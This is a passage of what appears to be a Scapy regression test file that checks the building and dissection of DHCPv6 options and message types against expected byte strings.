DHCP6OptNISPServers - Basic Dissection +a = DHCP6OptNISPServers(b'\x00\x1c\x00\x00') +a.optcode == 28 and a. optlen == 0 and a.nispservers == [] + += DHCP6OptNISPServers - Instantiation with specific values (1 address) +raw(DHCP6OptNISPServers(nispservers = ["2001:db8::1"] )) == b'\x00\x1c\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' + += DHCP6OptNISPServers - Dissection with specific values (1 address) +a = DHCP6OptNISPServers(b'\x00\x1c\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +a.optcode == 28 and a.optlen == 16 and len(a.nispservers) == 1 and a.nispservers[0] == "2001:db8::1" + += DHCP6OptNISPServers - Instantiation with specific values (2 addresses) +raw(DHCP6OptNISPServers(nispservers = ["2001:db8::1", "2001:db8::2"] )) == b'\x00\x1c\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' + += DHCP6OptNISPServers - Dissection with specific values (2 addresses) +a = DHCP6OptNISPServers(b'\x00\x1c\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') +a.optcode == 28 and a.optlen == 32 and len(a.nispservers) == 2 and a.nispservers[0] == "2001:db8::1" and a.nispservers[1] == "2001:db8::2" + + +############ +############ ++ Test DHCP6 Option - NIS Domain Name + += DHCP6OptNISDomain - Basic Instantiation +raw(DHCP6OptNISDomain()) == b'\x00\x1d\x00\x01\x00' + += DHCP6OptNISDomain - Basic Dissection +a = DHCP6OptNISDomain(b'\x00\x1d\x00\x00') +a.optcode == 29 and a.optlen == 0 and a.nisdomain == b"." + += DHCP6OptNISDomain - Instantiation with one domain name +raw(DHCP6OptNISDomain(nisdomain="toto.example.org")) == b'\x00\x1d\x00\x12\x04toto\x07example\x03org\x00' + += DHCP6OptNISDomain - Dissection with one domain name +a = DHCP6OptNISDomain(b'\x00\x1d\x00\x11\x04toto\x07example\x03org\x00') +a.optcode == 29 and a.optlen == 17 and a.nisdomain == b"toto.example.org." + += DHCP6OptNISDomain - Instantiation with one domain with trailing dot +raw(DHCP6OptNISDomain(nisdomain="toto.example.org.")) == b'\x00\x1d\x00\x12\x04toto\x07example\x03org\x00' + + +############ +############ ++ Test DHCP6 Option - NIS+ Domain Name + += DHCP6OptNISPDomain - Basic Instantiation +raw(DHCP6OptNISPDomain()) == b'\x00\x1e\x00\x01\x00' + += DHCP6OptNISPDomain - Basic Dissection +a = DHCP6OptNISPDomain(b'\x00\x1e\x00\x00') +a.optcode == 30 and a.optlen == 0 and a.nispdomain == b"." + += DHCP6OptNISPDomain - Instantiation with one domain name +raw(DHCP6OptNISPDomain(nispdomain="toto.example.org")) == b'\x00\x1e\x00\x12\x04toto\x07example\x03org\x00' + += DHCP6OptNISPDomain - Dissection with one domain name +a = DHCP6OptNISPDomain(b'\x00\x1e\x00\x12\x04toto\x07example\x03org\x00') +a.optcode == 30 and a.optlen == 18 and a.nispdomain == b"toto.example.org." + += DHCP6OptNISPDomain - Instantiation with one domain with trailing dot +raw(DHCP6OptNISPDomain(nispdomain="toto.example.org.")) == b'\x00\x1e\x00\x12\x04toto\x07example\x03org\x00' + + +############ +############ ++ Test DHCP6 Option - SNTP Servers + += DHCP6OptSNTPServers - Basic Instantiation +raw(DHCP6OptSNTPServers()) == b'\x00\x1f\x00\x00' + += DHCP6OptSNTPServers - Basic Dissection +a = DHCP6OptSNTPServers(b'\x00\x1f\x00\x00') +a.optcode == 31 and a. optlen == 0 and a.sntpservers == [] + += DHCP6OptSNTPServers - Instantiation with specific values (1 address) +raw(DHCP6OptSNTPServers(sntpservers = ["2001:db8::1"] )) == b'\x00\x1f\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' + += DHCP6OptSNTPServers - Dissection with specific values (1 address) +a = DHCP6OptSNTPServers(b'\x00\x1f\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +a.optcode == 31 and a.optlen == 16 and len(a.sntpservers) == 1 and a.sntpservers[0] == "2001:db8::1" + += DHCP6OptSNTPServers - Instantiation with specific values (2 addresses) +raw(DHCP6OptSNTPServers(sntpservers = ["2001:db8::1", "2001:db8::2"] )) == b'\x00\x1f\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' + += DHCP6OptSNTPServers - Dissection with specific values (2 addresses) +a = DHCP6OptSNTPServers(b'\x00\x1f\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') +a.optcode == 31 and a.optlen == 32 and len(a.sntpservers) == 2 and a.sntpservers[0] == "2001:db8::1" and a.sntpservers[1] == "2001:db8::2" + +############ +############ ++ Test DHCP6 Option - Information Refresh Time + += DHCP6OptInfoRefreshTime - Basic Instantiation +raw(DHCP6OptInfoRefreshTime()) == b'\x00 \x00\x04\x00\x01Q\x80' + += DHCP6OptInfoRefreshTime - Basic Dissction +a = DHCP6OptInfoRefreshTime(b'\x00 \x00\x04\x00\x01Q\x80') +a.optcode == 32 and a.optlen == 4 and a.reftime == 86400 + += DHCP6OptInfoRefreshTime - Instantiation with specific values +raw(DHCP6OptInfoRefreshTime(optlen=7, reftime=42)) == b'\x00 \x00\x07\x00\x00\x00*' + +############ +############ ++ Test DHCP6 Option - BCMCS Servers + += DHCP6OptBCMCSServers - Basic Instantiation +raw(DHCP6OptBCMCSServers()) == b'\x00"\x00\x00' + += DHCP6OptBCMCSServers - Basic Dissection +a = DHCP6OptBCMCSServers(b'\x00"\x00\x00') +a.optcode == 34 and a. optlen == 0 and a.bcmcsservers == [] + += DHCP6OptBCMCSServers - Instantiation with specific values (1 address) +raw(DHCP6OptBCMCSServers(bcmcsservers = ["2001:db8::1"] )) == b'\x00"\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' + += DHCP6OptBCMCSServers - Dissection with specific values (1 address) +a = DHCP6OptBCMCSServers(b'\x00"\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +a.optcode == 34 and a.optlen == 16 and len(a.bcmcsservers) == 1 and a.bcmcsservers[0] == "2001:db8::1" + += DHCP6OptBCMCSServers - Instantiation with specific values (2 addresses) +raw(DHCP6OptBCMCSServers(bcmcsservers = ["2001:db8::1", "2001:db8::2"] )) == b'\x00"\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' + += DHCP6OptBCMCSServers - Dissection with specific values (2 addresses) +a = DHCP6OptBCMCSServers(b'\x00"\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') +a.optcode == 34 and a.optlen == 32 and len(a.bcmcsservers) == 2 and a.bcmcsservers[0] == "2001:db8::1" and a.bcmcsservers[1] == "2001:db8::2" + + +############ +############ ++ Test DHCP6 Option - BCMCS Domains + += DHCP6OptBCMCSDomains - Basic Instantiation +raw(DHCP6OptBCMCSDomains()) == b'\x00!\x00\x00' + += DHCP6OptBCMCSDomains - Basic Dissection +a = DHCP6OptBCMCSDomains(b'\x00!\x00\x00') +a.optcode == 33 and a.optlen == 0 and a.bcmcsdomains == [] + += DHCP6OptBCMCSDomains - Instantiation with specific values (1 domain) +raw(DHCP6OptBCMCSDomains(bcmcsdomains=["toto.example.com."])) == b'\x00!\x00\x12\x04toto\x07example\x03com\x00' + += DHCP6OptBCMCSDomains - Dissection with specific values (1 domain) +a = DHCP6OptBCMCSDomains(b'\x00!\x00\x12\x04toto\x07example\x03com\x00') +a.optcode == 33 and a.optlen == 18 and len(a.bcmcsdomains) == 1 and a.bcmcsdomains[0] == "toto.example.com." + += DHCP6OptBCMCSDomains - Instantiation with specific values (2 domains) +raw(DHCP6OptBCMCSDomains(bcmcsdomains=["toto.example.com.", "titi.example.com."])) == b'\x00!\x00$\x04toto\x07example\x03com\x00\x04titi\x07example\x03com\x00' + += DHCP6OptBCMCSDomains - Dissection with specific values (2 domains) +a = DHCP6OptBCMCSDomains(b'\x00!\x00$\x04toto\x07example\x03com\x00\x04titi\x07example\x03com\x00') +a.optcode == 33 and a.optlen == 36 and len(a.bcmcsdomains) == 2 and a.bcmcsdomains[0] == "toto.example.com." and a.bcmcsdomains[1] == "titi.example.com." + + +############ +############ ++ Test DHCP6 Option - Relay Agent Remote-ID + += DHCP6OptRemoteID - Basic Instantiation +raw(DHCP6OptRemoteID()) == b'\x00%\x00\x04\x00\x00\x00\x00' + += DHCP6OptRemoteID - Basic Dissection +a = DHCP6OptRemoteID(b'\x00%\x00\x04\x00\x00\x00\x00') +a.optcode == 37 and a.optlen == 4 and a.enterprisenum == 0 and a.remoteid == b"" + += DHCP6OptRemoteID - Instantiation with specific values +raw(DHCP6OptRemoteID(enterprisenum=0xeeeeeeee, remoteid="someid")) == b'\x00%\x00\n\xee\xee\xee\xeesomeid' + += DHCP6OptRemoteID - Dissection with specific values +a = DHCP6OptRemoteID(b'\x00%\x00\n\xee\xee\xee\xeesomeid') +a.optcode == 37 and a.optlen == 10 and a.enterprisenum == 0xeeeeeeee and a.remoteid == b"someid" + + +############ +############ ++ Test DHCP6 Option - Subscriber ID + += DHCP6OptSubscriberID - Basic Instantiation +raw(DHCP6OptSubscriberID()) == b'\x00&\x00\x00' + += DHCP6OptSubscriberID - Basic Dissection +a = DHCP6OptSubscriberID(b'\x00&\x00\x00') +a.optcode == 38 and a.optlen == 0 and a.subscriberid == b"" + += DHCP6OptSubscriberID - Instantiation with specific values +raw(DHCP6OptSubscriberID(subscriberid="someid")) == b'\x00&\x00\x06someid' + += DHCP6OptSubscriberID - Dissection with specific values +a = DHCP6OptSubscriberID(b'\x00&\x00\x06someid') +a.optcode == 38 and a.optlen == 6 and a.subscriberid == b"someid" + + +############ +############ ++ Test DHCP6 Option - Client FQDN + += DHCP6OptClientFQDN - Basic Instantiation +raw(DHCP6OptClientFQDN()) == b"\x00'\x00\x02\x00\x00" + += DHCP6OptClientFQDN - Basic Dissection +a = DHCP6OptClientFQDN(b"\x00'\x00\x01\x00") +a.optcode == 39 and a.optlen == 1 and a.res == 0 and a.flags == 0 and a.fqdn == b"." + += DHCP6OptClientFQDN - Instantiation with various flags combinations +raw(DHCP6OptClientFQDN(flags="S")) == b"\x00'\x00\x02\x01\x00" and raw(DHCP6OptClientFQDN(flags="O")) == b"\x00'\x00\x02\x02\x00" and raw(DHCP6OptClientFQDN(flags="N")) == b"\x00'\x00\x02\x04\x00" and raw(DHCP6OptClientFQDN(flags="SON")) == b"\x00'\x00\x02\x07\x00" and raw(DHCP6OptClientFQDN(flags="ON")) == b"\x00'\x00\x02\x06\x00" + += DHCP6OptClientFQDN - Instantiation with one fqdn +raw(DHCP6OptClientFQDN(fqdn="toto.example.org")) == b"\x00'\x00\x13\x00\x04toto\x07example\x03org\x00" + += DHCP6OptClientFQDN - Dissection with one fqdn +a = DHCP6OptClientFQDN(b"\x00'\x00\x12\x00\x04toto\x07example\x03org\x00") +a.optcode == 39 and a.optlen == 18 and a.res == 0 and a.flags == 0 and a.fqdn == b"toto.example.org." + + +############ +############ ++ Test DHCP6 Option PANA Auth Agent + += DHCP6OptPanaAuthAgent - Basic Instantiation +raw(DHCP6OptPanaAuthAgent()) == b'\x00(\x00\x00' + += DHCP6OptPanaAuthAgent - Basic Dissection +a = DHCP6OptPanaAuthAgent(b"\x00(\x00\x00") +a.optcode == 40 and a.optlen == 0 and a.paaaddr == [] + += DHCP6OptPanaAuthAgent - Instantiation with specific values (1 address) +raw(DHCP6OptPanaAuthAgent(paaaddr=["2001:db8::1"])) == b'\x00(\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' + += DHCP6OptPanaAuthAgent - Dissection with specific values (1 address) +a = DHCP6OptPanaAuthAgent(b'\x00(\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +a.optcode == 40 and a.optlen == 16 and len(a.paaaddr) == 1 and a.paaaddr[0] == "2001:db8::1" + += DHCP6OptPanaAuthAgent - Instantiation with specific values (2 addresses) +raw(DHCP6OptPanaAuthAgent(paaaddr=["2001:db8::1", "2001:db8::2"])) == b'\x00(\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' + += DHCP6OptPanaAuthAgent - Dissection with specific values (2 addresses) +a = DHCP6OptPanaAuthAgent(b'\x00(\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') +a.optcode == 40 and a.optlen == 32 and len(a.paaaddr) == 2 and a.paaaddr[0] == "2001:db8::1" and a.paaaddr[1] == "2001:db8::2" + + +############ +############ ++ Test DHCP6 Option - New POSIX Time Zone + += DHCP6OptNewPOSIXTimeZone - Basic Instantiation +raw(DHCP6OptNewPOSIXTimeZone()) == b'\x00)\x00\x00' + += DHCP6OptNewPOSIXTimeZone - Basic Dissection +a = DHCP6OptNewPOSIXTimeZone(b'\x00)\x00\x00') +a.optcode == 41 and a.optlen == 0 and a.optdata == b"" + += DHCP6OptNewPOSIXTimeZone - Instantiation with specific values +raw(DHCP6OptNewPOSIXTimeZone(optdata="EST5EDT4,M3.2.0/02:00,M11.1.0/02:00")) == b'\x00)\x00#EST5EDT4,M3.2.0/02:00,M11.1.0/02:00' + += DHCP6OptNewPOSIXTimeZone - Dissection with specific values +a = DHCP6OptNewPOSIXTimeZone(b'\x00)\x00#EST5EDT4,M3.2.0/02:00,M11.1.0/02:00') +a.optcode == 41 and a.optlen == 35 and a.optdata == b"EST5EDT4,M3.2.0/02:00,M11.1.0/02:00" + + +############ +############ ++ Test DHCP6 Option - New TZDB Time Zone + += DHCP6OptNewTZDBTimeZone - Basic Instantiation +raw(DHCP6OptNewTZDBTimeZone()) == b'\x00*\x00\x00' + += DHCP6OptNewTZDBTimeZone - Basic Dissection +a = DHCP6OptNewTZDBTimeZone(b'\x00*\x00\x00') +a.optcode == 42 and a.optlen == 0 and a.optdata == b"" + += DHCP6OptNewTZDBTimeZone - Instantiation with specific values +raw(DHCP6OptNewTZDBTimeZone(optdata="Europe/Zurich")) == b'\x00*\x00\rEurope/Zurich' + += DHCP6OptNewTZDBTimeZone - Dissection with specific values +a = DHCP6OptNewTZDBTimeZone(b'\x00*\x00\rEurope/Zurich') +a.optcode == 42 and a.optlen == 13 and a.optdata == b"Europe/Zurich" + + +############ +############ ++ Test DHCP6 Option Relay Agent Echo Request Option + += DHCP6OptRelayAgentERO - Basic Instantiation +raw(DHCP6OptRelayAgentERO()) == b'\x00+\x00\x04\x00\x17\x00\x18' + += DHCP6OptRelayAgentERO - optlen field computation +raw(DHCP6OptRelayAgentERO(reqopts=[1,2,3,4])) == b'\x00+\x00\x08\x00\x01\x00\x02\x00\x03\x00\x04' + += DHCP6OptRelayAgentERO - instantiation with empty list +raw(DHCP6OptRelayAgentERO(reqopts=[])) == b'\x00+\x00\x00' + += DHCP6OptRelayAgentERO - Basic dissection +a=DHCP6OptRelayAgentERO(b'\x00+\x00\x00') +a.optcode == 43 and a.optlen == 0 and a.reqopts == [23,24] + += DHCP6OptRelayAgentERO - Dissection with specific value +a=DHCP6OptRelayAgentERO(b'\x00+\x00\x08\x00\x01\x00\x02\x00\x03\x00\x04') +a.optcode == 43 and a.optlen == 8 and a.reqopts == [1,2,3,4] + + +############ +############ ++ Test DHCP6 Option LQ Client Link + += DHCP6OptLQClientLink - Basic Instantiation +raw(DHCP6OptLQClientLink()) == b'\x000\x00\x00' + += DHCP6OptLQClientLink - Basic Dissection +a = DHCP6OptLQClientLink(b"\x000\x00\x00") +a.optcode == 48 and a.optlen == 0 and a.linkaddress == [] + += DHCP6OptLQClientLink - Instantiation with specific values (1 address) +raw(DHCP6OptLQClientLink(linkaddress=["2001:db8::1"])) == b'\x000\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' + += DHCP6OptLQClientLink - Dissection with specific values (1 address) +a = DHCP6OptLQClientLink(b'\x000\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +a.optcode == 48 and a.optlen == 16 and len(a.linkaddress) == 1 and a.linkaddress[0] == "2001:db8::1" + += DHCP6OptLQClientLink - Instantiation with specific values (2 addresses) +raw(DHCP6OptLQClientLink(linkaddress=["2001:db8::1", "2001:db8::2"])) == b'\x000\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' + += DHCP6OptLQClientLink - Dissection with specific values (2 addresses) +a = DHCP6OptLQClientLink(b'\x000\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') +a.optcode == 48 and a.optlen == 32 and len(a.linkaddress) == 2 and a.linkaddress[0] == "2001:db8::1" and a.linkaddress[1] == "2001:db8::2" + +############ +############ ++ Test DHCP6 Option - Boot File URL + += DHCP6OptBootFileUrl - Basic Instantiation +raw(DHCP6OptBootFileUrl()) == b'\x00;\x00\x00' + += DHCP6OptBootFileUrl - Basic Dissection +a = DHCP6OptBootFileUrl(b'\x00;\x00\x00') +a.optcode == 59 and a.optlen == 0 and a.optdata == b"" + += DHCP6OptBootFileUrl - Instantiation with specific values +raw(DHCP6OptBootFileUrl(optdata="http://wp.pl/file")) == b'\x00;\x00\x11http://wp.pl/file' + += DHCP6OptBootFileUrl - Dissection with specific values +a = DHCP6OptBootFileUrl(b'\x00;\x00\x11http://wp.pl/file') +a.optcode == 59 and a.optlen == 17 and a.optdata == b"http://wp.pl/file" + + +############ +############ ++ Test DHCP6 Option - Client Arch Type + += DHCP6OptClientArchType - Basic Instantiation +raw(DHCP6OptClientArchType()) +raw(DHCP6OptClientArchType()) == b'\x00=\x00\x00' + += DHCP6OptClientArchType - Basic Dissection +a = DHCP6OptClientArchType(b'\x00=\x00\x00') +a.optcode == 61 and a.optlen == 0 and a.archtypes == [] + += DHCP6OptClientArchType - Instantiation with specific value as just int +raw(DHCP6OptClientArchType(archtypes=7)) == b'\x00=\x00\x02\x00\x07' + += DHCP6OptClientArchType - Instantiation with specific value as single item list of int +raw(DHCP6OptClientArchType(archtypes=[7])) == b'\x00=\x00\x02\x00\x07' + += DHCP6OptClientArchType - Dissection with specific 1 value list +a = DHCP6OptClientArchType(b'\x00=\x00\x02\x00\x07') +a.optcode == 61 and a.optlen == 2 and a.archtypes == [7] + += DHCP6OptClientArchType - Instantiation with specific value as 2 item list of int +raw(DHCP6OptClientArchType(archtypes=[7, 9])) == b'\x00=\x00\x04\x00\x07\x00\x09' + += DHCP6OptClientArchType - Dissection with specific 2 values list +a = DHCP6OptClientArchType(b'\x00=\x00\x04\x00\x07\x00\x09') +a.optcode == 61 and a.optlen == 4 and a.archtypes == [7, 9] + + +############ +############ ++ Test DHCP6 Option - Client Network Inter Id + += DHCP6OptClientNetworkInterId - Basic Instantiation +raw(DHCP6OptClientNetworkInterId()) +raw(DHCP6OptClientNetworkInterId()) == b'\x00>\x00\x03\x00\x00\x00' + += DHCP6OptClientNetworkInterId - Basic Dissection +a = DHCP6OptClientNetworkInterId(b'\x00>\x00\x03\x00\x00\x00') +a.optcode == 62 and a.optlen == 3 and a.iitype == 0 and a.iimajor == 0 and a.iiminor == 0 + += DHCP6OptClientNetworkInterId - Instantiation with specific values +raw(DHCP6OptClientNetworkInterId(iitype=1, iimajor=2, iiminor=3)) == b'\x00>\x00\x03\x01\x02\x03' + += DHCP6OptClientNetworkInterId - Dissection with specific values +a = DHCP6OptClientNetworkInterId(b'\x00>\x00\x03\x01\x02\x03') +a.optcode == 62 and a.optlen == 3 and a.iitype == 1 and a.iimajor == 2 and a.iiminor == 3 + + +############ +############ ++ Test DHCP6 Option - ERP Domain + += DHCP6OptERPDomain - Basic Instantiation +raw(DHCP6OptERPDomain()) == b'\x00A\x00\x00' + += DHCP6OptERPDomain - Basic Dissection +a = DHCP6OptERPDomain(b'\x00A\x00\x00') +a.optcode == 65 and a.optlen == 0 and a.erpdomain == [] + += DHCP6OptERPDomain - Instantiation with specific values (1 domain) +raw(DHCP6OptERPDomain(erpdomain=["toto.example.com."])) == b'\x00A\x00\x12\x04toto\x07example\x03com\x00' + += DHCP6OptERPDomain - Dissection with specific values (1 domain) +a = DHCP6OptERPDomain(b'\x00A\x00\x12\x04toto\x07example\x03com\x00') +a.optcode == 65 and a.optlen == 18 and len(a.erpdomain) == 1 and a.erpdomain[0] == "toto.example.com." + += DHCP6OptERPDomain - Instantiation with specific values (2 domains) +raw(DHCP6OptERPDomain(erpdomain=["toto.example.com.", "titi.example.com."])) == b'\x00A\x00$\x04toto\x07example\x03com\x00\x04titi\x07example\x03com\x00' + += DHCP6OptERPDomain - Dissection with specific values (2 domains) +a = DHCP6OptERPDomain(b'\x00A\x00$\x04toto\x07example\x03com\x00\x04titi\x07example\x03com\x00') +a.optcode == 65 and a.optlen == 36 and len(a.erpdomain) == 2 and a.erpdomain[0] == "toto.example.com." and a.erpdomain[1] == "titi.example.com." + + +############ +############ ++ Test DHCP6 Option - Relay Supplied Option + += DHCP6OptRelaySuppliedOpt - Basic Instantiation +raw(DHCP6OptRelaySuppliedOpt()) == b'\x00B\x00\x00' + += DHCP6OptRelaySuppliedOpt - Basic Dissection +a = DHCP6OptRelaySuppliedOpt(b'\x00B\x00\x00') +a.optcode == 66 and a.optlen == 0 and a.relaysupplied == [] + += DHCP6OptRelaySuppliedOpt - Instantiation with specific values +raw(DHCP6OptRelaySuppliedOpt(relaysupplied=DHCP6OptERPDomain(erpdomain=["toto.example.com."]))) == b'\x00B\x00\x16\x00A\x00\x12\x04toto\x07example\x03com\x00' + += DHCP6OptRelaySuppliedOpt - Dissection with specific values +a = DHCP6OptRelaySuppliedOpt(b'\x00B\x00\x16\x00A\x00\x12\x04toto\x07example\x03com\x00') +a.optcode == 66 and a.optlen == 22 and len(a.relaysupplied) == 1 and isinstance(a.relaysupplied[0], DHCP6OptERPDomain) and a.relaysupplied[0].erpdomain[0] == "toto.example.com." + + +############ +############ ++ Test DHCP6 Option Client Link Layer address + += Basic build & dissect +s = raw(DHCP6OptClientLinkLayerAddr()) +assert(s == b"\x00O\x00\x08\x00\x01\x00\x00\x00\x00\x00\x00") + +p = DHCP6OptClientLinkLayerAddr(s) +assert(p.clladdr == "00:00:00:00:00:00") + +r = b"\x00O\x00\x08\x00\x01\x00\x01\x02\x03\x04\x05" +p = DHCP6OptClientLinkLayerAddr(r) +assert(p.clladdr == "00:01:02:03:04:05") + + +############ +############ ++ Test DHCP6 Option Virtual Subnet Selection + += Basic build & dissect +s = raw(DHCP6OptVSS()) +assert(s == b"\x00D\x00\x01\xff") + +p = DHCP6OptVSS(s) +assert(p.type == 255) + + +############ +############ ++ Test DHCP6 Messages - DHCP6_Solicit + += DHCP6_Solicit - Basic Instantiation +raw(DHCP6_Solicit()) == b'\x01\x00\x00\x00' + += DHCP6_Solicit - Basic Dissection +a = DHCP6_Solicit(b'\x01\x00\x00\x00') +a.msgtype == 1 and a.trid == 0 + += DHCP6_Solicit - Basic test of DHCP6_solicit.hashret() +DHCP6_Solicit().hashret() == b'\x00\x00\x00' + += DHCP6_Solicit - Test of DHCP6_solicit.hashret() with specific values +DHCP6_Solicit(trid=0xbbccdd).hashret() == b'\xbb\xcc\xdd' + += DHCP6_Solicit - UDP ports overload +a=UDP()/DHCP6_Solicit() +a.sport == 546 and a.dport == 547 + += DHCP6_Solicit - Dispatch based on UDP port +a=UDP(raw(UDP()/DHCP6_Solicit())) +isinstance(a.payload, DHCP6_Solicit) + + +############ +############ ++ Test DHCP6 Messages - DHCP6_Advertise + += DHCP6_Advertise - Basic Instantiation +raw(DHCP6_Advertise()) == b'\x02\x00\x00\x00' + += DHCP6_Advertise - Basic test of DHCP6_solicit.hashret() +DHCP6_Advertise().hashret() == b'\x00\x00\x00' + += DHCP6_Advertise - Test of DHCP6_Advertise.hashret() with specific values +DHCP6_Advertise(trid=0xbbccdd).hashret() == b'\xbb\xcc\xdd' + += DHCP6_Advertise - Basic test of answers() with solicit message +a = DHCP6_Solicit() +b = DHCP6_Advertise() +a > b + += DHCP6_Advertise - Test of answers() with solicit message +a = DHCP6_Solicit(trid=0xbbccdd) +b = DHCP6_Advertise(trid=0xbbccdd) +a > b + += DHCP6_Advertise - UDP ports overload +a=UDP()/DHCP6_Advertise() +a.sport == 547 and a.dport == 546 + + +############ +############ ++ Test DHCP6 Messages - DHCP6_Request + += DHCP6_Request - Basic Instantiation +raw(DHCP6_Request()) == b'\x03\x00\x00\x00' + += DHCP6_Request - Basic Dissection +a=DHCP6_Request(b'\x03\x00\x00\x00') +a.msgtype == 3 and a.trid == 0 + += DHCP6_Request - UDP ports overload +a=UDP()/DHCP6_Request() +a.sport == 546 and a.dport == 547 + + +############ +############ ++ Test DHCP6 Messages - DHCP6_Confirm + += DHCP6_Confirm - Basic Instantiation +raw(DHCP6_Confirm()) == b'\x04\x00\x00\x00' + += DHCP6_Confirm - Basic Dissection +a=DHCP6_Confirm(b'\x04\x00\x00\x00') +a.msgtype == 4 and a.trid == 0 + += DHCP6_Confirm - UDP ports overload +a=UDP()/DHCP6_Confirm() +a.sport == 546 and a.dport == 547 + + +############ +############ ++ Test DHCP6 Messages - DHCP6_Renew + += DHCP6_Renew - Basic Instantiation +raw(DHCP6_Renew()) == b'\x05\x00\x00\x00' + += DHCP6_Renew - Basic Dissection +a=DHCP6_Renew(b'\x05\x00\x00\x00') +a.msgtype == 5 and a.trid == 0 + += DHCP6_Renew - UDP ports overload +a=UDP()/DHCP6_Renew() +a.sport == 546 and a.dport == 547 + + +############ +############ ++ Test DHCP6 Messages - DHCP6_Rebind + += DHCP6_Rebind - Basic Instantiation +raw(DHCP6_Rebind()) == b'\x06\x00\x00\x00' + += DHCP6_Rebind - Basic Dissection +a=DHCP6_Rebind(b'\x06\x00\x00\x00') +a.msgtype == 6 and a.trid == 0 + += DHCP6_Rebind - UDP ports overload +a=UDP()/DHCP6_Rebind() +a.sport == 546 and a.dport == 547 + + +############ +############ ++ Test DHCP6 Messages - DHCP6_Reply + += DHCP6_Reply - Basic Instantiation +raw(DHCP6_Reply()) == b'\x07\x00\x00\x00' + += DHCP6_Reply - Basic Dissection +a=DHCP6_Reply(b'\x07\x00\x00\x00') +a.msgtype == 7 and a.trid == 0 + += DHCP6_Reply - UDP ports overload +a=UDP()/DHCP6_Reply() +a.sport == 547 and a.dport == 546 + += DHCP6_Reply - Answers + +assert not DHCP6_Reply(trid=0).answers(DHCP6_Request(trid=1)) +assert DHCP6_Reply(trid=1).answers(DHCP6_Request(trid=1)) + + +############ +############ ++ Test DHCP6 Messages - DHCP6_Release + += DHCP6_Release - Basic Instantiation +raw(DHCP6_Release()) == b'\x08\x00\x00\x00' + += DHCP6_Release - Basic Dissection +a=DHCP6_Release(b'\x08\x00\x00\x00') +a.msgtype == 8 and a.trid == 0 + += DHCP6_Release - UDP ports overload +a=UDP()/DHCP6_Release() +a.sport == 546 and a.dport == 547 + + +############ +############ ++ Test DHCP6 Messages - DHCP6_Decline + += DHCP6_Decline - Basic Instantiation +raw(DHCP6_Decline()) == b'\x09\x00\x00\x00' + += DHCP6_Confirm - Basic Dissection +a=DHCP6_Confirm(b'\x09\x00\x00\x00') +a.msgtype == 9 and a.trid == 0 + += DHCP6_Decline - UDP ports overload +a=UDP()/DHCP6_Decline() +a.sport == 546 and a.dport == 547 + + +############ +############ ++ Test DHCP6 Messages - DHCP6_Reconf + += DHCP6_Reconf - Basic Instantiation +raw(DHCP6_Reconf()) == b'\x0A\x00\x00\x00' + += DHCP6_Reconf - Basic Dissection +a=DHCP6_Reconf(b'\x0A\x00\x00\x00') +a.msgtype == 10 and a.trid == 0 + += DHCP6_Reconf - UDP ports overload +a=UDP()/DHCP6_Reconf() +a.sport == 547 and a.dport == 546 + + +############ +############ ++ Test DHCP6 Messages - DHCP6_InfoRequest + += DHCP6_InfoRequest - Basic Instantiation +raw(DHCP6_InfoRequest()) == b'\x0B\x00\x00\x00' + += DHCP6_InfoRequest - Basic Dissection +a=DHCP6_InfoRequest(b'\x0B\x00\x00\x00') +a.msgtype == 11 and a.trid == 0 + += DHCP6_InfoRequest - UDP ports overload +a=UDP()/DHCP6_InfoRequest() +a.sport == 546 and a.dport == 547 + + +############ +############ ++ Test DHCP6 Messages - DHCP6_RelayForward + += DHCP6_RelayForward - Basic Instantiation +raw(DHCP6_RelayForward()) == b'\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += 